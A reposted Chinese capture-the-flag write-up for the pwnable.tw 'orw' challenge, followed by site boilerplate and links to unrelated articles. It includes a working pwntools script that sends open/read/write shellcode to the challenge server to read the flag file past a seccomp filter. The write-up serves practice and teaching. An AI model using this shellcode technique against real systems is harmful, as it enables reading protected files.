pwnable.tw | 第2题orw

news/2024/11/16 19:26:28/文章来源:https://www.cnblogs.com/z5onk0/p/18295681

### 前言

pwnable.tw第二题

分析

IDA打开,发现是直接读入shellcode后执行

image-20240710113302974

orw_seccomp显然是限制了shellcode进行系统调用

image-20240710113550939

seccomp-tools查看到open\read\write这些系统调用没被禁用

利用

# -*- coding: utf-8 -*-
from pwn import *io = remote("chall.pwnable.tw", 10001)context(terminal=['gnome-terminal', '-x', 'bash', '-c'], os='linux', arch='x86')buf = 0x0804A060 + 0x60
shellcode = asm(shellcraft.open("/home/orw/flag"))
shellcode += asm(shellcraft.read(3, buf, 0x60))
shellcode += asm(shellcraft.write(1, buf, 0x60))io.sendafter("Give my your shellcode:", shellcode)
io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/742106.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

pwnable.tw | 第二题orw

pwnable.tw | 第二题orw

pwnable.tw之第二题orw### 前言 pwnable.tw第二题 分析 IDA打开,发现是直接读入shellcode后执行orw_seccomp显然是限制了shellcode进行系统调用seccomp-tools查看到open\read\write这些系统调用没被禁用 利用 # -*- coding: utf-8 -*- from pwn import *io = remote("cha…
阅读更多...
Docker 因端口映射不一致出现的问题

Docker 因端口映射不一致出现的问题

问题描述 因为服务器原先已经安装了nginx(非容器安装),并且占用80端口; 而我方习惯使用容器进行安装应用,故用安装了一个容器ngixn; docker-compose.yml version: 3 services:nginx:restart: alwayscontainer_name: nginximage: nginxports:- 81:80- 443:443volumes:- /dat…
阅读更多...
最开始学java时写的文档

最开始学java时写的文档

最开始学java时写的的文档一,java基础 1.常用cmd窗口操作 E: 切换到e盘 dir 查看当前路径下的内容 cd 目录 进入单级目录 cd.. 退回到上一级目录 cd 目录1\目录2\ 进入多级目录 cls清屏但不会退出当前目录 exit关闭cmd窗口 想要在任意目录下都可以打开指定软件可以把软…
阅读更多...
探索大模型:袋鼠云在 Text To SQL 上的实践与优化

探索大模型:袋鼠云在 Text To SQL 上的实践与优化

Text To SQL 指的是将自然语言转化为能够在关系型数据库中执行的结构化查询语言(简称 SQL)。近年来,伴随人工智能大模型技术的不断进步,Text To SQL 任务的成功率显著提升,这得益于大模型的推理、理解以及指令遵循等能力。 对于大数据平台来说,集成 Text To SQL 功能意义…
阅读更多...
jdk离线安装包下载

jdk离线安装包下载

下载 华为云 https://repo.huaweicloud.com/java/jdk/ 小站点(比较全) https://www.injdk.cn/ 华为云,比较老旧小站点,推荐安装 rpm - *.rpm
阅读更多...
PMP-生命周期

PMP-生命周期

生命周期项目的起点是项目章程得到批准。解散资源是项目的结束点。 项目生命周期,阶段和阶段关口项目生命周期:指项目的启动到完成经历的一系列阶段。项目阶段:是一组具有逻辑关系的项目活动的集合。通常以一个或多个可交付成果为结束。阶段关口:在项目阶段结束时进行,将…
阅读更多...
乘用车1-5月销量同比增长7%,火山引擎数据飞轮能帮车企盘活下半年增长吗?

乘用车1-5月销量同比增长7%,火山引擎数据飞轮能帮车企盘活下半年增长吗?

火山引擎推出企业数智化升级新模式“数据飞轮”,并面向汽车行业输出覆盖智能营销、汽车联网等场景在内的全套解决方案,在历经一年的行业实践后,已经成为越来越多车企实现数智化升级的模式选择。对车企来说,更贴合市场趋势以及业务需求的数智化升级,或许是实现下半年进一步…
阅读更多...
光猫改桥接 河南移动 ZXHN F663N

光猫改桥接 河南移动 ZXHN F663N

光猫改桥接 河南移动 ZXHN F663N 基本情况 本人地区 河南移动,光猫型号 中兴 ZXHN F663N 因为当前光猫密码已经被自动修改过,已经不是网上可以随便搜索到的管理员密码,所以获取密码直接找了咸鱼,几块钱搞定,查的很快 备份原有配置数据 在改桥接之前,我还是想备份一下配置…
阅读更多...
WordPress将管理员用户主页修改网站首页

WordPress将管理员用户主页修改网站首页

最近在做 WordPress 站群的一些项目测试,主题在调用作者的时候就会链接到作者主页,加上很多时候 WordPress 网站就只会使用一个账户来发布文章,虽然可以通过修改主题代码的方式将作者的链接直接链接到网站首页,但是作为一个优雅的 WordPress 开发者来说,肯定是不会轻易动主…
阅读更多...
【学习笔记】四边形不等式优化 DP

【学习笔记】四边形不等式优化 DP

命运是不可见的星辰,人们往往无法看见命运的全貌,却一直被它指引前行。从繁星点点中,梵天能够窥见命运的轨迹。决策单调性对于最优化问题 \(f_{i}=\min\limits_{j=1}^{i} \{ w_{j,i} \}\) 称 \(w(j,i)\) 为成本函数,参数为 \(i\) 的最优化问题称为问题 \(i\) ,记问题 \(i\…
阅读更多...
灵动Mini-SPIN0230开发板测评

灵动Mini-SPIN0230开发板测评

灵动Mini-SPIN0230开发板简介与开箱上电测评官网资料详见 MM32SPIN0230 . 开发板资料详见:MiniBoard(MM32SPIN0230B3TV) .MM32SPIN0230系列是灵动MindSPIN旗下高性能的单电机控制产品,采用Cortex-M0内核 ,集成了运动控制所需的专用模拟外设,包括12位高精度ADC、2路模拟比较…
阅读更多...
来此加密便宜的多域名SSL证书申请

来此加密便宜的多域名SSL证书申请

在数字化时代的浪潮中,网站的安全性已成为企业和个人不可或缺的一部分。特别是在数据传输和用户隐私保护方面,SSL证书的作用愈发显著。申请多域名SSL证书步骤 1、登录来此加密网站,输入域名,可以勾选泛域名和包含根域。2、选择加密方式,一般选择默认就可以了,也可以自定义…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023